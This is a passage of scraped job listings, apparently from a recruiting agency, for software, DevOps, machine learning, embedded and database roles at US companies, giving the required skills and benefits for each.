- Experience with cryptography or blockchain

Our key technologies:
- Backend: Python (gRPC, Tornado), C, PostgreSQL, RabbitMQ
- Infrastructure: AWS, Kubernetes, Docker
- OS: Linux

**What's In It for You**
- The opportunity to join a well-funded, cutting-edge financial technology company at a very early stage
- Competitive salary and equity
- Competitive medical benefits
- 401k
- Flexible working policies: we work twice a week from home
- Smart coworkers who are world-class experts in the field of cryptography

So, if you are a Principal Python Engineer with experience, please apply today!

*Principal Python Engineer* *CA-Oakland* *JG2-1493050*
(USA-CA-San Mateo) Senior Full Stack Engineer

Senior Full Stack Engineer (High Growth Start-up)
Skills Required - React, Django, SQL, Python 3, APIs, JavaScript, CSS, jQuery

A high-growth start-up in San Mateo is seeking a Full Stack guru.

**What You Will Be Doing**
You will be our Full Stack extraordinaire! You will understand our product from the user's point of view and write the code to support the product (or modify the product to better support the code!).

**What You Need for this Position**
- Experience building the backend service of a web application
- Expert-level experience in at least one language (Python 3 preferred), and general experience across a diversity of languages (statically- vs. dynamically-typed languages, functional languages, languages with interesting features)
- Familiarity with server-side MVC frameworks (Django preferred)
- Familiarity with SQL databases and basic optimizations for efficient queries
- Strong sense of domain modeling and a desire to take complex requirements and reduce them to simpler systems

Nice to have:
- Strong frontend engineering skills and experience with modern JavaScript or CSS frameworks (more than just jQuery!)
- Experience working in a product-oriented team and designing with the user in mind
- Advanced knowledge of database optimization and administration
- DevOps experience with managing cloud infrastructure

**What's In It for You**
We offer a competitive compensation package that includes flexible paid time off; health, vision, and dental benefits; a 401(k) plan; an employee stock option program; and much more.

If you want to join forces with one of the most promising start-ups in the Bay Area, please apply.

*Senior Full Stack Engineer* *CA-San Mateo* *JG2-1493042*
(USA-CA-Oakland) Senior DevOps Engineer

Senior DevOps Engineer (Python, AWS)
Skills Required - Python, AWS, JavaScript, Kubernetes, Docker, Chef, Jenkins, SQL

As the second member of the DevOps team, you'll manage availability of all our AWS services and support engineering through operations, automation, consultation, tooling, research, and education. You are capable of advising on architectural decisions for these services through a deep understanding of systems internals. You'll own all aspects of our AWS relationship, including provisioning, monitoring, security, and connectivity.

**What You Need for this Position**
- Deep experience with AWS, including RDS, ElastiCache, Kinesis, SQS, EC2
- A good grasp of distributed systems, and the issues that go along with them
- Solid experience in Python

Nice to have:
- Experience with cryptography or blockchain

Our key technologies:
- Backend: Python (gRPC, Tornado), C, PostgreSQL, RabbitMQ
- Infrastructure: AWS, Kubernetes, Docker
- OS: Linux

**What's In It for You**
- The opportunity to join a well-funded, cutting-edge financial technology company at a very early stage
- Competitive salary and equity
- Competitive medical benefits
- 401k
- Flexible working policies: we work twice a week from home
- Smart coworkers who are world-class experts in the field of cryptocurrency

So, if you are a Senior DevOps Engineer (Python, AWS) with experience, please apply today!

*Senior DevOps Engineer* *CA-Oakland* *JG2-1493045*
(USA-CA-San Jose) Senior Field Engineer

Senior Field Engineer (Rapid Prototyping, Coding)
Skills Required - Prototype Code, JavaScript, Python, Go, Testing

If you are a Senior Field Engineer with experience shipping prototype code quickly and working with end clients, please apply today.

**What You Need for this Position**
At least 3 years of experience and knowledge of:
- Prototype code
- JavaScript
- Python
- Go
- Testing

**What's In It for You**
- Competitive salary
- Stock options
- Health, dental, and vision insurance
- 401k benefits
- Diverse, passionate, and skilled co-workers
- Casual working environment
- Weekly company lunches
- Quarterly company outings
- Flexible PTO
- Discounted pet insurance
- Disability and life insurance
- Commuter benefits, retirement plans, and shopping discounts

So, if you are a Senior Field Engineer (Rapid Prototyping, Coding) with experience, please apply today!

*Senior Field Engineer* *CA-San Jose* *JG2-1493057*
(USA-MO-St. Louis) Full Stack Developer

Full Stack Developer
Skills Required - Python, React/Redux, Express/Electron, JavaScript, Semantic UI, Bootstrap, Data Analysis, PostgreSQL, Django, Flask

If you are a Full Stack JavaScript Developer with Python experience, you'll want to read this...

We are a rapidly growing software startup headquartered in downtown Saint Louis. Using machine learning and speech-to-text AI technologies, we have created a product that transcribes and analyzes sales and customer service calls in real time to deliver live recommendations to representatives while they navigate their calls. We are looking for a Full Stack Engineer to join our exciting and rapidly growing team in downtown St. Louis.

**What You Will Be Doing**
You will be creating, evolving, and maintaining our infrastructure, which includes our desktop and web applications, cloud processing module, and transcription engine.

**What You Need for this Position**
- Full stack development
- JavaScript (React/Redux & Express/Electron)
- Python (Flask, Tornado, Django, gRPC)
- CSS (Semantic UI/Bootstrap)
- PostgreSQL
- Data analysis

**What's In It for You**
- Competitive compensation with equity
- Generous benefits package with the works
- Work for a stable, rapidly growing company
- Step into a high-impact role
- Relocation assistance available if needed
- Surround yourself with top industry talent
- Awesome office location in a downtown STL incubator

So, if you are a Full Stack Developer with experience, please apply today!

*Full Stack Developer* *MO-St. Louis* *GR1-1492920*
(USA-WA-Bellevue) Machine Learning Scientist - NLP, Recommender/Ranking Systems

Machine Learning Scientist - NLP, Recommender/Ranking Systems
Skills Required - Machine Learning, NLP, Recommender Systems, Python, Deep Learning Theory, Hadoop, Spark, Building Data Pipelines

If you are a Machine Learning Scientist with experience, please read on!

One of the largest and most well-known travel agencies is looking for a Machine Learning Scientist. We are an online travel agency that enables users to access a wide range of services. We book airline tickets, hotel reservations, car rentals, cruises, vacation packages, and various attractions and services via the world wide web and telephone travel agents. Our team helps power many of the features on our website. We design and build models that help our customers find what they want and where they want to go. As a member of our group, your contributions will affect millions of customers and will have a direct impact on our business results. You will have opportunities to collaborate with other talented data scientists and move the business forward using novel approaches and rich sources of data. If you want to resolve real-world problems using state-of-the-art machine learning and deep learning approaches, in a stimulating and data-rich environment, let's talk.

**What You Will Be Doing**
- Provide technical leadership and oversight, and mentor junior machine learning scientists
- Understand business opportunities, identify key challenges, and deliver working solutions
- Collaborate with business partners, program management, and engineering team partners
- Communicate effectively with technical peers and senior leadership

**What You Need for this Position**
At least 3 years of experience and knowledge of:
- PhD (MS considered) in computer science or equivalent quantitative fields with 3+ years of industry or academic experience
- Expertise in NLP or recommender systems (strongly preferred)
- Deep understanding of classic machine learning and deep learning theory, and extensive hands-on experience putting it into practice
- Excellent command of Python and related machine learning/deep learning tools and frameworks
- Strong algorithmic design skills
- Experience working in a distributed, cloud-based computing environment (e.g., Hadoop or Spark)
- Experience building data pipelines and working with live data (cleaning, visualization, and modeling)

**What's In It for You**
- Vacation/PTO
- Medical
- Dental
- Vision
- Bonus
- 401k

So, if you are a Machine Learning Scientist with experience, please apply today!

*Machine Learning Scientist - NLP, Recommender/Ranking Systems* *WA-Bellevue* *GK2-1493004*
(USA-CA-Los Angeles) Software Engineer, Infrastructure - Python, PostgreSQL, AWS, GCP

Software Engineer, Infrastructure - Python, PostgreSQL, AWS, GCP
Skills Required - Python, Gunicorn, Celery, PostgreSQL, AWS, GCP, Finance, Real Estate

If you are a Software Engineer, Infrastructure with experience, please read on!

We offer 100% financing for PACE-approved, energy-efficient upgrades to your home or commercial building. If your upgrade saves energy or water, we have you covered with no money out of pocket. We partner with local governments to bring you low-cost financing that gets repaid through your property tax bill. The financing can be used for improvements that are good for the environment and save you money on your utility bills.

**What You Will Be Doing**
- Building out our cloud infrastructure. We haven't started yet, and it will be your job to help design it and build it
- Continuous integration and deployment are in our future; you'll need to work with our product engineers to define, instrument, and build out our deployment pipeline

**What You Need for this Position**
- Excellent knowledge of Python and Python applications (e.g., Gunicorn, Celery)
- Working knowledge of relational (PostgreSQL) and distributed databases
- A real passion for implementing and building upon cloud computing platforms (especially AWS and GCP)
- Strong systems fundamentals
- A belief in automation, testing, and instrumentation, demonstrated throughout your career
- Excellent communication skills and a desire to share and learn
- 5+ years of full-time industry experience
- Degree in Computer Science or related field
- Experience in the finance or real estate industries

**What's In It for You**
- Competitive compensation
- Paid time off
- Medical, dental & vision insurance
- 401k

So, if you are a Software Engineer, Infrastructure with experience, please apply today!

*Software Engineer, Infrastructure - Python, PostgreSQL, AWS, GCP* *CA-Los Angeles* *GC3-1492994*
(USA-WA-Bellevue) Embedded Linux Engineer

Embedded Linux Engineer
Skills Required - Embedded C/C++, Embedded Linux, Linux Drivers, CI/CD Tools, Toolchains, Constrained ARM Programming

If you are an Embedded Linux Engineer with at least 3 years' experience, please read on!

**What You Will Be Doing**
You will participate in embedded firmware and Linux development for wireless power applications. This position will involve hands-on C and C++ embedded Linux programming on constrained ARM hardware. Typical duties will include:
- Maintaining/creating Linux system builds and releases
- Designing and implementing C/C++ code
- Writing unit tests and supporting automated test tools
- Managing CI/CD tools for Linux and embedded IAR toolchains
- Documenting and designing new and existing processes

**What You Need for this Position**
- Deep understanding of embedded C/C++ in embedded systems on Linux
- Experience writing/maintaining Linux drivers down to low levels (SPI, I2C, GPIO)
- Strong experience with shell scripting and Python or similar
- Knowledge of source control/build and CI/CD tools (Bitbucket, Jira, Git, Bamboo, Atlassian, etc.)

Preferred skills/experience (NOT REQUIRED):
- Knowledge of communications protocols and theory at the PHY & MAC levels
- Experience with Scrum/Kanban and Agile methodologies
- Interest or experience in radio, wireless communications, and/or IoT

**What's In It for You**
- Vacation/PTO
- Medical
- Dental
- Vision
- Bonus
- 401k

So, if you are an Embedded Linux Engineer with at least 3 years' experience, please apply today!

*Embedded Linux Engineer* *WA-Bellevue* *DW5-1493003*
(USA-IA-Urbandale) Senior Java Engineer

Senior Java Engineer
Skills Required - RESTful API, AWS, Git, Java

If you are a Senior Java Engineer with experience, please read on!

We are looking for a highly engaged Senior Software Engineer to design and develop internal and external web services and integrate with clients and other web services. You will have the opportunity to explore new ideas and solutions and play a major role in how we build our new platform around Applications and Job Sourcing Campaign Management. You will be part of an Agile team culture with people who enjoy shared goals and releasing new product features often. If you like to learn, you will like it here. Our best developers are adept at picking up new things and thrive in our multidisciplinary environment where there are many challenging problems to solve. Whether you consider yourself a front-end or back-end specialist, as long as you are excited about learning and helping others learn, we want to meet you.

The successful candidate will be competent in AWS technologies, including as a Java/J2EE developer, and ideally will have worked in all phases of the project life cycle. We are looking for a positive, flexible, and hands-on engineer who is passionate about using emerging technologies and writing quality code. You will be part of a high-caliber team consisting of tech, product, and DevOps working in short iterations, building production-ready software. If you're tired of a corporate cubicle job and want to join a fun, passionate team with limitless potential, we would love to meet you.

**What You Will Be Doing**
- Design, develop, and implement web-based Java REST APIs and applications to support business requirements
- Work with UX design to design, create, and implement UI components that are engaging and easy to use
- Follow approved life-cycle methodologies, create design documents, and perform development and testing
- Develop unit and integration tests for your code, integrating with continuous integration and continuous delivery pipelines
- Generate Swagger and other API documentation
- Work with both existing server-side rendered pages (JSP) and responsive Angular-based elements and applications for multiple form factors
- Thrive as a quick learner in a fast-paced environment
- Collaborate with Architecture and other team members on the design of projects
- Follow and help influence API and web development standards across the technology organization
- Work in a fast-paced, agile environment, collaborating with peers from around the world
- Evangelize good software engineering; always be learning

**What You Need for this Position**
Required knowledge, skills, and attributes:
- Strong verbal and written communication skills
- Effective time management skills
- The ability to work in a team atmosphere

Required education and/or experience:
- Willingness and desire to learn new and different technologies
- Six (6) or more years' experience with analyzing, designing, coding, building, testing, and deploying application systems in a business environment
- Experience developing within an Agile environment
- Commercial RESTful API design and implementation experience
- Experience working in AWS and/or utilizing AWS services: CloudFormation, CloudWatch, API Gateway, Lambda Functions, CloudFront, SQS, SNS, SES, S3, DynamoDB, X-Ray, Step Functions, ECS, EKS, EC2, RDS, Redshift, Kinesis
- Experience working with partners and 3rd parties in integrating with their APIs
- Experience with Git and GitHub
- Experience with some of the following technologies or similar:
  - Java or another OO language, Python, SQL
  - JavaScript, CSS, Angular, Angular CLI, TypeScript, RxJS, SASS, NPM
  - Spring Framework, Hibernate, RESTful web services
  - Docker, Tomcat, Linux
  - Git, Gradle, Jenkins, Artifactory
  - Postgres, MongoDB
  - JSON, XML, YAML
- Experience with Tomcat and Java web apps is preferred
- Team player who exhibits effective interpersonal skills with a collaborative style
- Experience with Continuous Integration (CI) tools: Jenkins, CloudFormation, CodePipeline/CodeDeploy, Terraform, or others
- Experience with Google Analytics and SEO concepts and validation a plus

So, if you are a Senior Java Engineer with experience, please apply today!

*Senior Java Engineer* *IA-Urbandale* *CT2-1492971*
(USA-CO-Boulder) Full Stack Engineer

Full Stack Engineer
Skills Required - Ruby on Rails, JSON APIs, HTML, CSS, JavaScript, MySQL, PostgreSQL, ORM, Python, Git

If you are a Full Stack Engineer with experience, please read on!

Based in Boulder, we are an agricultural company that provides commercial growers and agronomists with the real-time insight and intelligence necessary to enhance farming efficiencies and increase profitability through drone technology. Due to growth, we are seeking a skilled Full Stack Engineer to add to our team. If you are interested in hearing more, apply now!

**What You Need for this Position**
- Ruby on Rails (preferred) or Python
- JSON APIs
- HTML
- CSS
- JavaScript
- MySQL or PostgreSQL
- Docker or some other virtualization technology

Nice to have:
- Leaflet, Mapbox, GeoServer
- Git

**What's In It for You**
- Competitive salary
- Vacation/PTO
- Medical
- Dental
- Vision
- 401k
- Company perks and more!

So, if you are a Full Stack Engineer with experience, please apply today!

*Full Stack Engineer* *CO-Boulder* *CG3-1492741*
(USA-MA-Boston) Oracle Developer/DBA - Oracle 12c, Amazon RDS, PL/SQL

Oracle Developer/DBA - Oracle 12c, Amazon RDS, PL/SQL
Skills Required - Oracle 12c, Amazon RDS, PL/SQL, Perl, Python, Fintech, Financial Analytics, Oracle DBA, Oracle 11g, Oracle Tuning

If you are an Oracle Developer/DBA with experience, please read on!

**Top Reasons to Work with Us**
Fortune 500 financial firm

**What You Will Be Doing**
As a member of a highly skilled and growing development team, the candidate will be responsible for maintaining our company's Oracle 12c database environment in Amazon RDS, as well as development in PL/SQL, Perl, and Python. The candidate will learn about Wall Street analytics and will help to support our company's inbound and outbound data feeds. Be at the forefront of high finance and technology. Learn all about Wall Street. Family-friendly work schedule, beautiful office with spectacular views of Boston, fully stocked kitchen, and many other benefits.

**What You Need for this Position**
More than 3 years of experience and knowledge of:
- Oracle 12c
- Amazon RDS
- PL/SQL
- Perl
- Python
- Fintech
- Financial analytics
- Oracle DBA
- Oracle 11g

**What's In It for You**
Base 125-165k
- Vacation/PTO
- Medical
- Dental
- Vision
- Relocation
- Bonus
- 401k

Healthcare, dental, commuter benefits, 401(k), short- and long-term disability, life insurance, 15 vacation/sick days, 9 paid holidays, 5-12 work-at-home days, employee referral bonus program.

So, if you are an Oracle DBA with experience, please apply today!

*Oracle Developer/DBA - Oracle 12c, Amazon RDS, PL/SQL* *MA-Boston* *CD-1492726*
          (USA-MA-Boston) Oracle DBA & Developer - Oracle 12c, Amazon RDS, PL/SQL      Cache   Translate Page      
Oracle DBA & Developer - Oracle 12c, Amazon RDS, PL/SQL Oracle DBA & Developer - Oracle 12c, Amazon RDS, PL/SQL - Skills Required - Oracle 12c, Amazon RDS, PL/SQL, Perl, Python, Fintech, Financial Analytics, Oracle DBA, Oracle 11G, Oracle Tuning If you are a Oracle DBA with experience, please read on! **Top Reasons to Work with Us** Fortune 500 financial firm **What You Will Be Doing** As a member of a highly skilled and growing development team, candidate will be responsible for maintaining our companies Oracle 12c database environment in Amazon RDS as well as development in PL/SQL, Perl and Python. Candidate will learn about Wall Street analytics and will help to support our companies inbound and outbound data feeds. Be at the forefront of high finance and technology. Learn all about Wall Street. Family-friendly work schedule, beautiful office with spectacular views of Boston, fully stocked kitchen and many other benefits. **What You Need for this Position** More Than 5 Years of experience and knowledge of: - Oracle 12c - Amazon RDS - PL/SQL - Perl - Python - Fintech - Financial Analytics - Oracle DBA - Oracle 11G **What's In It for You** Base 125-165k - Vacation/PTO - Medical - Dental - Vision - Relocation - Bonus - 401k healthcare, dental, commuter benefits, 401K, short and long-term disability, life insurance, 15 vacation/sick days, 9 paid holidays, 5-12 work-at-home days, employee referral bonus program So, if you are a Oracle DBA with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. 
*Oracle DBA & Developer - Oracle 12c, Amazon RDS, PL/SQL* *MA-Boston* *CD-1492715*
          (USA-NY-New York) Senior Data Analyst
Senior Data Analyst

Skills Required: SaaS/E-Commerce, Data Analyst, SQL, Python, ETL

Job title: Senior Data Analyst
Job Location: New York, NY

We are a marketplace that provides licensed cannabis retailers the ability to order from their favorite brands, as well as a suite of software tools for those brands to manage and scale their operations.

**Top Reasons to Work with Us**

With over 2,000 dispensaries and more than 500 leading brands in Colorado, Washington, California, Oregon, Nevada, Maryland, and Arizona, we are setting the industry standard for how cannabis brands and retailers work together. Our team, backed by funding from leading VCs, is poised to define the cannabis wholesale market. We were just named one of Fast Company's "Top 10 Most Innovative Companies in Enterprise", joining the ranks of Amazon, Slack, and VMWare - and we're just getting started!

**What You Will Be Doing**

- Implement a Business Intelligence tool to help us drive business decisions.
- Propose, build, and own our data warehouse architecture and infrastructure.
- Own the design and development of automated dashboards.
- Drive internal business decisions and directions through the establishment of core KPIs.
- Create industry-defining metrics and standard reporting to help drive the cannabis industry.
- Support ad-hoc data analysis or reporting needs from teammates or customers.
- Proactively conduct ad-hoc analyses to discover new product and business opportunities.
- Develop new metrics to better identify trends and key performance drivers within a particular area of the business.

**What You Need for this Position**

- 5+ years working at an established SaaS or E-Commerce company
- 5+ years working with SQL and other data insight tools
- Proficiency in at least one programming language, such as Python
- Strong grasp of statistics and experience with open-source big data technology
- 3+ years of working cross-functionally to create KPIs that drive or support strategy decisions
- 2+ years with ETL processes
- Has led business intelligence implementation efforts with tools such as Periscope, Looker, Tableau, or Domo
- Has published industry reports or worked closely with a marketing team to showcase powerful data insights and establish thought leadership

**What's In It for You**

- Healthcare matching
- 3 weeks paid vacation a year
- Fun office environment
- Competitive salary
- Benefit matching (medical, dental, vision)
- Generous stock options
- Team events

Interviews are ongoing; please complete the questions and you will move straight to the hiring manager for possible interviews. Incomplete applications will move through HR first. Please complete applications to expedite the process.

Applicants must be authorized to work in the U.S.

*Senior Data Analyst* *NY-New York* *BZ2-1493027*
          (USA-CA-Sunnyvale) Full Stack Software Engineer